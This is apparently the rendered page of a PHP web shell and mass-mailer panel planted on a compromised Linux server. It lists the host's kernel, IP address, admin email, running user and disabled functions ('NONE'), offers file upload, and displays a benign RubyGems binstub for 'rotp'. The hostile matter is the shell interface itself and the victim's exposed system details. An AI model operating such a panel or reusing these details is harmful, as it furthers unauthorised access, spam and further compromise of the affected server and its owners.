Envio de Emails phpmail

*Lembrete: texto em HTML *Separado por quebra de linha
Nome do Servidor: Linux gsoft-dev 5.14.0-598.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Jul 8 16:37:49 UTC 2025 x86_64
Sistema Operacional: Linux
Endereço IP: 160.251.83.132
Software usado: Apache/2.4.62 (CentOS Stream) OpenSSL/3.5.1 SVN/1.14.1 Phusion_Passenger/6.0.27
Email admin: info@gsoft.co.jp
Safe Mode:
HEX
HEX
Server: Apache/2.4.62 (CentOS Stream) OpenSSL/3.5.1 SVN/1.14.1 Phusion_Passenger/6.0.27
System: Linux gsoft-dev 5.14.0-598.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Jul 8 16:37:49 UTC 2025 x86_64
User: ghd (1006)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: //bin/rotp
#!/usr/bin/env ruby
#
# This file was generated by RubyGems.
#
# The application 'rotp' is installed as part of a gem, and
# this file is here to facilitate running it.
#

require 'rubygems'

Gem.use_gemdeps

version = ">= 0.a"

str = ARGV.first
if str
  str = str.b[/\A_(.*)_\z/, 1]
  if str and Gem::Version.correct?(str)
    version = str
    ARGV.shift
  end
end

if Gem.respond_to?(:activate_bin_path)
load Gem.activate_bin_path('rotp', 'rotp', version)
else
gem "rotp", version
load Gem.bin_path("rotp", "rotp", version)
end